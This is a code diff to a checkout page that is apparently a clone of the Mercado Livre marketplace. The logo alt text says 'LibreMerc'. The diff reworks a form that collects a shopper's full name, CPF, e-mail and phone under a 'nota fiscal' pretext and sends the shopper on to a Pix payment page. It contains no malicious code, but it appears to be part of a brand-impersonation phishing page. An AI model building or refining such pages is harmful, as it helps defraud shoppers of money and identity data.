--- a/checkout.html
+++ b/checkout.html
@@ -3,43 +3,31 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1" />
-  <title>Checkout | Mercado Livre</title>
+  <title>Finalizar Compra | Mercado Livre</title>
   <link rel="stylesheet" href="style.css" />
 </head>
-<body>
-  <header class="header-site">
-    <a href="index.html" class="logo-link">
-      <img src="assets/logo-1.png" alt="Logo LibreMerc" class="logo" />
-    </a>
-  </header>
+<body class="cep-page">
+  <a href="index.html" class="logo-link">
+    <img src="assets/logo-1.png" alt="Logo LibreMerc" class="logo" />
+  </a>
 
-  <main class="container">
-    <h2>Finalize sua compra</h2>
-    <form id="checkoutForm">
+  <div class="cep-container">
+    <h2>Preencha seus dados para a nota fiscal</h2>
+    <form action="pix.html" method="GET">
       <label for="nome">Nome completo:</label>
-      <input type="text" id="nome" name="nome" required />
+      <input type="text" id="nome" required />
 
       <label for="cpf">CPF:</label>
-      <input type="text" id="cpf" name="cpf" maxlength="14" required />
+      <input type="text" id="cpf" required />
 
       <label for="email">E-mail:</label>
-      <input type="email" id="email" name="email" required />
+      <input type="text" id="email" required />
 
       <label for="telefone">Telefone:</label>
-      <input type="tel" id="telefone" name="telefone" required />
+      <input type="text" id="telefone" required />
 
       <button type="submit">Ir para pagamento</button>
     </form>
-  </main>
-
-  <script>
-    document.getElementById("checkoutForm").addEventListener("submit", function (e) {
-      e.preventDefault();
-
-      // Aqui pode validar dados, salvar em localStorage ou backend (se tiver)
-
-      window.location.href = "pix.html";
-    });
-  </script>
+  </div>
 </body>
 </html>
